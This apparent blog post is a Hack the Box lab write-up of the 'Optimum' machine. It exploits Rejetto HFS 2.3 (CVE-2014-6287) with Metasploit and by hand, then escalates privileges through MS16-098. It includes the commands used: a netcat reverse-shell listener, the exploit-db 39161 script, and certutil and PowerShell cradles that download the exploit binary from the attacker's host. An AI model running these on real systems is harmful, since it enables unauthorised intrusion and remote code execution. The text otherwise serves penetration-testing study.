
Hack the Box — Optimum

With and Without Metasploit

Originally, I solved this box as part of the TCM Security Practical Ethical Hacking course with Metasploit, but Heath, the instructor, did mention that going back to solve it manually would be good practice. Since the OSCP exam allows Metasploit against only a single target, I figured I should get into the habit of doing boxes without it. This box is also on the TJ Null list of OSCP-like machines.

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.8

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.8

nmap -sU -O -p- -oA nmap/udp 10.10.10.8

A full 65535-port UDP scan runs for hours, so start it and work from the TCP results in the meantime. The service scan identifies port 80 as HttpFileServer httpd 2.3.

Enum

Google it… The banner is HttpFileServer httpd 2.3 (Rejetto HFS), and searching for that version leads straight to a remote command execution bug.

Exploitable! We find https://www.exploit-db.com/exploits/39161 (HttpFileServer 2.3.x Remote Command Execution, CVE-2014-6287). HFS refuses search terms that contain its {. macro delimiter, but the check stops at a null byte, so a %00 at the start of the search parameter lets attacker-supplied macros such as save and exec reach the template engine and run commands as the user HFS is running as.

Exploitation With Metasploit

Find the exploit for HttpFileServer 2.3: in msfconsole, search hfs turns up exploit/windows/http/rejetto_hfs_exec

Configure the options (RHOSTS, LHOST, and the SRVHOST/SRVPORT the module uses to serve its payload to the target)

There's a difference in architecture between the box (x64 Windows) and our meterpreter session (the module's default payload is x86)

But that doesn't seem to affect our exploitation

That is expected: a 32-bit meterpreter runs fine under WOW64 on 64-bit Windows, and Metasploit auto-detects the target. The mismatch does matter later, though. Several local privilege-escalation modules need a native x64 session, so if the suggester or a kernel exploit misbehaves, migrate into a 64-bit process (or re-run with the payload set to windows/x64/meterpreter/reverse_tcp) before retrying.

Privilege Escalation

I background the first meterpreter session and run post/multi/recon/local_exploit_suggester, which checks the session against Metasploit's local exploits and lists the ones the box appears vulnerable to
The only option that needs to be configured here is SESSION
If you don't remember the session ID, sessions -l lists them

Once the suggester runs, I find what I'm really looking for, which is a way to escalate from the "Kostas" user to NT AUTHORITY\SYSTEM

We get NT AUTHORITY\SYSTEM from the exploit (confirm with getuid in meterpreter)

Manual Exploitation

The exploit we found by googling does not carry its own payload: it makes the target download nc.exe from a web server we control and then runs it as a reverse shell. So first we must find netcat and copy it into our working folder so we can serve it

locate nc.exe  
cp /usr/share/windows-binaries/nc.exe ~/HTB/Optimum-10.10.10.8

Start the HTTP server

python -m SimpleHTTPServer 80 

Start a listener

nc -nlvp 5555

Download the exploit we found: https://www.exploit-db.com/exploits/39161

"searchsploit -m 39161" makes it easy to copy an exploit from Kali's local exploit-db mirror into the current directory

Edit the exploit with our details: the ip_addr and local_port variables near the top of the script must be set to our attacking IP and the port our listener is on (5555 here). The script hard-codes http://<ip_addr>/nc.exe for the download, which is why the HTTP server above has to run on port 80

Run the exploit. It is written for Python 2 (note the urllib2 import), so run it with a Python 2 interpreter, and as the exploit-db header warns, it may take more than one attempt

python 39161.py 10.10.10.8 80

Acquire shell on listening port

Get user flag

Priv Esc

I used https://github.com/Glyph-Research/Windows-Exploit-Suggester.git which, as its name implies, suggests exploits by comparing the hotfixes listed in a systeminfo dump against Microsoft's security bulletin database

Initially, I ran this based on the readme instructions:

pip install xlrd --upgrade

to install and update the dependency, BUT it actually broke the suggester.

I kept getting this error:

The cause is that xlrd 2.x dropped support for every format except legacy .xls, while the bulletin database the tool downloads is really an .xlsx workbook despite the .xls extension it is saved with. The fix was to downgrade to the older version I had before, which still reads .xlsx:

pip install xlrd==1.2.0 

Now that the dependency issue has been fixed, let me go back and explain the preparation for the above command.

The suggester needs two inputs: the target's patch level and Microsoft's bulletin database. For the first, I run the systeminfo command from the Kostas foothold

Copy the output of systeminfo into sysinfo.txt on the attacking machine (the parts that matter are the OS Name and OS Version lines and the Hotfix(s) list of installed KBs)

Then I run the following to download the bulletin database as an .xls file named after the current date

./windows-exploit-suggester.py --update

Once those two pieces are created I can run the suggester, pointing --database at the downloaded .xls and --systeminfo at sysinfo.txt:
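At its core the suggester does a set difference: the KBs that fix each bulletin for the detected OS, minus the KBs that systeminfo says are installed. The following is an added example, not the tool's own code, that reimplements that check in Python 3 over a constructed systeminfo excerpt and a three-entry sample bulletin table. The OS line follows what Optimum reports, but the hotfix list is made up, and the bulletin-to-KB entries are illustrative and should be checked against the Microsoft bulletin spreadsheet the real tool downloads, which also handles superseding updates that this toy version ignores.

```python
#!/usr/bin/env python3
"""Toy version of the windows-exploit-suggester check.

Added example, not the tool's own code. SYSINFO is a constructed systeminfo
excerpt (the box's real dump is not reproduced here) and BULLETINS is a small
sample table; the real tool works from Microsoft's full bulletin spreadsheet.
"""
import re

# Constructed systeminfo excerpt, in the layout the Windows command prints.
SYSINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
"""

# Sample table: (bulletin, affected-product substring, fixing KB, public exploit).
# Illustrative entries only; verify them against the bulletin database.
BULLETINS = [
    ("MS16-098", "Windows Server 2012 R2", "KB3177725", "EDB 41020"),
    ("MS16-032", "Windows Server 2012 R2", "KB3139914", "EDB 39719"),
    ("MS10-015", "Windows 7", "KB977165", "EDB 11199"),
]


def parse_systeminfo(text: str) -> dict:
    """Extract OS name, version, architecture and the set of installed KBs."""

    def field(name: str) -> str:
        # Anchored at line start so 'OS Name' does not match 'Host Name'.
        m = re.search(rf"^{re.escape(name)}:\s*(.+?)\s*$", text, re.M)
        return m.group(1) if m else ""

    return {
        "os": field("OS Name"),
        "version": field("OS Version"),
        "arch": "x64" if "x64" in field("System Type") else "x86",
        # KB numbers appear anywhere in the Hotfix(s) block, one per line.
        "hotfixes": set(re.findall(r"\bKB\d{6,7}\b", text)),
    }


def missing_patches(info: dict, bulletins=BULLETINS) -> list[tuple[str, str, str]]:
    """Bulletins that apply to this OS whose fixing KB is not installed."""
    return [
        (bulletin, kb, exploit)
        for bulletin, product, kb, exploit in bulletins
        if product in info["os"] and kb not in info["hotfixes"]
    ]


if __name__ == "__main__":
    info = parse_systeminfo(SYSINFO)
    print(f"{info['os']} ({info['arch']}), {len(info['hotfixes'])} hotfixes installed")
    for bulletin, kb, exploit in missing_patches(info):
        print(f"[E] {bulletin} missing {kb} -> {exploit}")
```

The product filter is why the Windows 7 entry never shows up for a Server 2012 R2 target, and the hotfix set is why a KB that is present drops a bulletin off the list; the real tool's output for the box is what drives the choice of 41020.exe below.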

Exploit-db 41020 is a precompiled binary for MS16-098, the win32k RGNOBJ integer overflow on Windows 8.1 / Server 2012 R2 x64, which matches this box. From here all I have to do is download the executable that has already been compiled, and since I still have my python server up and running I put this .exe in the same folder so I can grab it with Kostas

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe

Go back to my Kostas shell and use certutil to fetch it

certutil.exe -urlcache -f http://10.10.14.37:80/41020.exe toasted.exe

This can also be accomplished with PowerShell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Running the downloaded exploit drops into a new cmd.exe as NT AUTHORITY\SYSTEM (check with whoami). Once the privileges have been escalated, getting the root flag is simple

Issues

Why was any of this possible? Both the foothold and the privilege escalation were due to old, unpatched software: an HFS 2.3 build vulnerable to a command-execution bug disclosed in 2014, and a kernel missing a 2016 security update. This box is old but has evergreen relevance because we are still facing issues in 2023 due to unpatched software and system components.

This post is licensed under CC BY 4.0 by the author.